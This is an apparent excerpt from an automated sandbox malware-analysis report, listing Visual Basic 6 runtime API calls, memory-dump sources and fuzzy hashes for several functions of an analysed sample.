                                                                                    • #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                    • __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                    • #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041AE53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$#537#632BstrChkstkErrorListOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 4204360173-0
                                                                                    • Opcode ID: 9079adedfb1e4168ae56332b3bd7e2ad2e82147f1aed6ccd27be71f1baf0200a
                                                                                    • Instruction ID: a2acd3fc5ce1e320d1d355b2b6f0e125889106b46c88f37359d4e3ac7756507f
                                                                                    • Opcode Fuzzy Hash: 9079adedfb1e4168ae56332b3bd7e2ad2e82147f1aed6ccd27be71f1baf0200a
                                                                                    • Instruction Fuzzy Hash: 9431A9B2D00219ABDB01EFD5C986FEEBBB8BF04304F54442BF105B7191DB7855458B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B664 Relevance: 15.1, APIs: 10, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B680
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000002,?,?,004016A6), ref: 0041B69A
                                                                                      • Part of subcall function 0041B5CD: __vbaChkstk.MSVBVM60(00000000,004016A6,004015D8,?,00000002,?,?,004016A6), ref: 0041B5E9
                                                                                      • Part of subcall function 0041B5CD: __vbaOnError.MSVBVM60(000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B619
                                                                                      • Part of subcall function 0041B5CD: __vbaUbound.MSVBVM60(00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B62C
                                                                                      • Part of subcall function 0041B5CD: __vbaLbound.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B63A
                                                                                    • __vbaI2I4.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B6B2
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000), ref: 0041B6EE
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000,004015D8,00000000), ref: 0041B711
                                                                                    • #608.MSVBVM60(?,?,004015D8,00000000,004015D8,00000000), ref: 0041B71E
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B72F
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B735
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B73F
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B74E
                                                                                    • __vbaStrCopy.MSVBVM60(004015D8,00000000), ref: 0041B765
                                                                                    • __vbaFreeStr.MSVBVM60(0041B79F), ref: 0041B799
                                                                                    • __vbaErrorOverflow.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B7B3
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041B7D4
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041B802
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041B80F
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B81C
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B824
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B831
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041B872,?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B86C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ChkstkFree$Ary1CopyDerefError$#608#717DestructLboundListOverflowUboundVar2
                                                                                    • String ID:
                                                                                    • API String ID: 540562774-0
                                                                                    • Opcode ID: aa49e4b08db19f750d1313d8b8314369ff47381929f1d5ed0e5a2e23e84cac8c
                                                                                    • Instruction ID: 12d6025552427dd28d458c1af6eaa4522468dd8a08945a176294c0d25e15a14b
                                                                                    • Opcode Fuzzy Hash: aa49e4b08db19f750d1313d8b8314369ff47381929f1d5ed0e5a2e23e84cac8c
                                                                                    • Instruction Fuzzy Hash: 83212F75C00159AACB01EBE5C942AFEBBBCEF04704F14802BF511EB1A1D77C9985CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B7B8 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041B7D4
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041B802
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041B80F
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B81C
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B824
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B831
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041B872,?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B86C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#717ChkstkDestructFreeVar2
                                                                                    • String ID:
                                                                                    • API String ID: 2770403345-0
                                                                                    • Opcode ID: 6a20b4fc4b6aba7980897d37e491f761c4dbb1c6d12768856b49e88f0cf0eaf0
                                                                                    • Instruction ID: 51f9e0401e8b082d3f17bff6ac8f5d8ab5ef547d44a11f48efa70ba67d3f8a97
                                                                                    • Opcode Fuzzy Hash: 6a20b4fc4b6aba7980897d37e491f761c4dbb1c6d12768856b49e88f0cf0eaf0
                                                                                    • Instruction Fuzzy Hash: 7C01BA72D40208BADB01EBE5C886FDEB7BCAB04704F40852BF211B7191D778A5088B64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%